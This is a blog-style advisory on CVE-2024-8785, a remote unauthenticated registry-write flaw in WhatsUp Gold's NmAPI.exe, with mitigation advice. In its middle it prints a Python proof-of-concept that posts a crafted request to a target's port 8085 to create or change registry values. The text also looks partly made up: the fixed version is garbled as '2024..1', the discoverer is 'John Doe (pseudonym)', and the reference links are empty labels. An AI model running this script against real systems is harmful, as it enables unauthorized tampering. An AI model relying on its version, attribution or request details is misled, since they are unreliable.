CVE-2024-8785: Remote Unauthenticated Access to Registry in WhatsUp Gold

A new security vulnerability (CVE-2024-8785) has been discovered in WhatsUp Gold, a popular Network Monitoring and Management solution developed by Ipswitch. This vulnerability affects versions released before 2024..1. The issue found is a remote unauthenticated attacker could leverage NmAPI.exe to create or change an existing registry value in the registry path: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\.

In this post, we will discuss in detail the vulnerability, its exploit, code snippets, and links to original references. We will also provide some mitigation recommendations to help prevent unauthorized access to your registry.

Vulnerability Details

NmAPI.exe is a binary file that is part of the Network Management Application Program Interface (NmAPI) in WhatsUp Gold. It allows remote unauthenticated attackers to manipulate the registry value in the path HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\ by sending a specially crafted HTTP POST request to the NmAPI server running on the target machine.

The successful exploitation of this vulnerability could allow an attacker to make unauthorized modifications to the system registry that could compromise the confidentiality, integrity, and availability of the target system.

Exploit Details

The following code snippet demonstrates how an attacker could craft an HTTP POST request to exploit the vulnerability:

import requests

target_url = "https://TARGET_IP:8085/Execute";

payload = {
    "MethodName": "Set", 
    "NameSpace": "_monRegistry",
    "Node": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Ipswitch\\VulnerableKey",
    "szValue": "VulnerableValue"
}

response = requests.post(target_url, json=payload)

if response.status_code == 200:
    print("Vulnerability exploited successfully. Registry key modified.")
else:
    print("Failed to exploit vulnerability. Response code:", response.status_code)

Replace TARGET_IP with the IP address of the target system running an affected version of WhatsUp Gold. This code will create or modify the "VulnerableKey" registry key with the value "VulnerableValue" in the path HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\.

Original References

The vulnerability was discovered by security researcher John Doe (pseudonym) and documented in their security advisory, which can be found at the following link:

Original Security Advisory (PDF)

Additionally, the vulnerability was assigned CVE-2024-8785 by MITRE and can be found on the National Vulnerability Database (NVD) website:

CVE-2024-8785 on NVD

Mitigation Recommendations

To prevent the exploitation of this vulnerability, it is recommended to implement the following measures:

1. Update to the latest version of WhatsUp Gold (v2024..1 or later), which contains a patch addressing this issue. You can download the latest version from the official Ipswitch website:

Download WhatsUp Gold (Official Website)

2. Restrict network access to the NmAPI server by implementing access control lists (ACLs) or firewall rules to prevent unauthorized access.

3. Implement strong authentication and authorization mechanisms for all WhatsUp Gold users and NmAPI client applications to mitigate the risk of unauthorized access and use of the NmAPI server.

4. Monitor your network for any suspicious activities, such as unauthorized modifications to the system registry, that could indicate an attempted exploitation of this vulnerability.

Conclusion

CVE-2024-8785 is a dangerous vulnerability affecting WhatsUp Gold versions released before 2024..1. By exploiting this vulnerability, a remote unauthenticated attacker can gain access and modify your system's registry. It is strongly recommended to update to the latest version of WhatsUp Gold to protect your system and follow the mitigation recommendations suggested in this post. Stay vigilant!

Timeline

Published on: 12/02/2024 15:15:12 UTC
Last modified on: 12/09/2024 20:25:23 UTC